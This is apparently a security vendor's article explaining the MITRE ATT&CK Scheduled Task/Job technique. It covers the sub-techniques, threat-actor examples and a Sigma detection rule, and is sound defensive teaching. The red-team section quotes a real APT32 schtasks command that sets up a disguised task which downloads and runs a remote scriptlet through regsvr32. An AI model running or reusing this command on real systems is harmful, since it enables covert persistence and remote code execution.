A scheduled task is a command, program or script to be executed at a particular time in the future (e.g. 11/08/2022 1:00 a.m.), at regular intervals (e.g. every Monday at 1:00 a.m.), or when a defined event occurs (e.g. a user logs on the system). Legitimate users like system administrators use scheduled tasks to create and run operational tasks automatically. Adversaries also use task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence. Our research has found that Scheduled Task was the seventh most prevalent ATT&CK technique used by adversaries in their malware.
In this article, we review:
the fundamentals of the Scheduled Task technique
updates on the technique in the new version of the ATT&CK framework
sub-techniques of the Scheduled Task/Job technique
its use cases by threat actors and malware
red and blue team exercises for this technique
Operating systems provide utilities to automate execution of programs or scripts on a defined schedule:
schtasks.exe (Microsoft Windows)
at.exe (Microsoft Windows)
cron (Unix-like operating systems)
Updates in the New Version of the MITRE ATT&CK Framework
The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques . MITRE ATT&CK Sub-techniques are a way to describe a specific implementation of a technique in more detail.
In the new sub-technique version of the MITRE ATT&CK Framework, name of the T1053 Scheduled Task technique is changed as T1053 Scheduled Task/Job and new sub-techniques are added:
At (Windows) was a pre-defined behaviour within T1053 Scheduled Task. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.002 At (Windows).
Remaining behaviour in the previous T1053 Scheduled Task became a new sub-technique as T1053.005 Scheduled Task.
The T1168 Local Job Scheduling technique in the previous version is merged into T1053 Scheduled Task/Job:
At (Linux) was a pre-defined behaviour within T1168 Local Job Scheduling. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.001 At (Linux).
Cron was a pre-defined behaviour within T1168 Local Job Scheduling. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.003 Cron.
T1160 Launch Daemon was a technique in the previous version. Now it is a sub-technique under the T1053 Scheduled Task/Job technique as T1053.04 Launchd.
Scheduled Task/Job Sub-techniques
T1053.001 At (Linux) at is a command-line utility that allows users to schedule commands in various operating systems, such as Unix-like operating systems (e.g. Linux distributions, macOS and BSD), and Microsoft Windows. This sub-technique covers the at command within Linux, but it may be extended to other Unix-like operating systems. at utility in Linux allows users to schedule commands to be executed only once at a particular time. An adversary may use at command to schedule one-time execution of malicious code in the future.
T1053.002 At (Windows) Modern Microsoft Windows operating systems provide a graphical user interface (GUI) for Task Scheduler. Moreover, Microsoft Windows offers two native command line utilities for task scheduling: at.exe and schtasks.exe. There are two requirements to use the at command in Windows:
The Task Scheduler service must be running.
The user must be logged on as a Local Administrator.
Adversaries use at.exe to schedule tasks to create a recurring task to execute at regular intervals. For example, it can be used to run a reverse shell to keep reverse shell sessions running.
At.exe can be used to run a command on not only the local system but also remote systems. As a real-world example, the TG-0416 Threat Group uses at.exe for lateral movement . BRONZE BUTLER APT group uses the at command to execute a malicious batch file on a remote system during lateral movement.
T1053.003 Cron Cron is a utility in Unix-like operating systems to configure scheduled tasks. It can be used to schedule a command, script or program to execute periodically. As mentioned above, at is also a task scheduling utility in Unix-like OSs. However, they have different use cases. While cron is suitable for repetitive tasks, at is suitable for one time tasks. Adversaries use cron to execute their malicious payloads at regular intervals for persistence. As a recent example, attackers use cron to run the downloaded malicious payload every minute in the Ngrok Mining Botnet campaign .
T1053.004 Launchd Launchd is the OS service management daemon for macOS that boots the system, and loads and maintains services. It is similar to systemd on Linux distributions and Service ControlManager on Microsoft Windows. When a macOS system starts up, launchd is the first process launched after the kernel. Thus, adversaries may use the launchd daemon to schedule their malicious executables to run at system startup. As an example, Olyx macOS backdoor uses launchd to ensure the backdoor executable automatically launches when the user logs in .
T1053.005 Scheduled Task This sub-technique refers to Windows Task Scheduler . Windows Task Scheduler is a utility that enables users to schedule execution of commands, scripts or programs according to time-based or event-based triggers. A time-based trigger starts at a certain time or starts at specified time intervals, such as daily, weekly or monthly. An event-based trigger starts at a specific system event, such as when the system starts up or when a user logs on. Task Scheduler also supports multiple triggers, allowing the task to be launched in different ways. Adversaries may use various methods to access the task scheduler:
Running schtasks on the command line (the most common method)
Using a .NET wrapper
Using the Windows netapi32 library
E.g. Disttrack wiper malware uses the netapi32 library to create a scheduled task to run the payload on the remote system .
Opening Task Scheduler GUI within the Control Panel
Red and Blue Team Exercises
Red Teaming - How to simulate?
In this exercise, we explain a real scheduled task command in a malicious VBA macro in a Word document that was used by the APT32 Threat Group.
This payload was included in the following Word document:
MD5: 6baafffa7bf960dec821b627f9653e44 SHA-1: c944d737dc028d9327dbb95d684ca97232c38620 SHA-256: 1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
Briefly, the below command in the VBA code embedded in the Word document creates a scheduled task named SystemSoundsServices (mimicking System Sounds Service of Windows) to run Regsvr32.exe every 30 minutes. Regsvr32.exe is used to bypass application whitelisting script protection for executing a Component Object Model (COM) scriptlet that is dynamically downloaded from the given URL.
schtasks.exe schtasks /create /sc MINUTE /tn "SystemSoundsServices" /tr "\"regsvr32.exe\" /s /n /u /i:http://126.96.36.199:80/g4.ico scrobj.dll" /mo 30 /F
In conclusion, the given code incorporates following MITRE ATT&CK techniques:
T1053.005 Scheduled Task 
T1036.004 Masquerading: Masquerade Task or Service , 
T1218.010 Signed Binary Proxy Execution: Regsvr32 –
T1559.01 Inter-Process Communication: Component Object Model 
Blue Teaming - How to detect?
The following Sigma rule can be used to detect creating a scheduled task that runs regsvr32.exe via schtasks.exe.
title: Scheduled Task Creation to Execute Regsvr32 status: experimental description: Detects the attempt to create a scheduled task that runs regsvr32.exe via schtasks.exe. This technique is commonly utilized for persistence as APT32 Threat Group's usage in its campaigns. author: Picus Security references: - https://attack.mitre.org/tactics/TA0002/ - https://attack.mitre.org/tactics/TA0003/ - https://attack.mitre.org/tactics/TA0004/ - https://attack.mitre.org/techniques/T1053/ - https://attack.mitre.org/groups/G0050/ logsource: product: windows service: security definition1: 'Requirements: Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Detailed Tracking\Audit Process Creation' definition2: 'Requirements: Group Policy : Computer Configuration\ Administrative Templates\ System\ Audit Process Creation\ Include Command Line' detection: selection: EventID: 4688 NewProcessName: '*\schtasks.exe' ProcessCommandLine: '*/create* *regsvr32.exe*' condition: selection falsepositives: - Unknown level: high tags: - attack.persistence - attack.privilege_escalation - attack.execution - attack.ta0002 - attack.ta0003 - attack.ta0004 - attack.g0050 - attack.t1053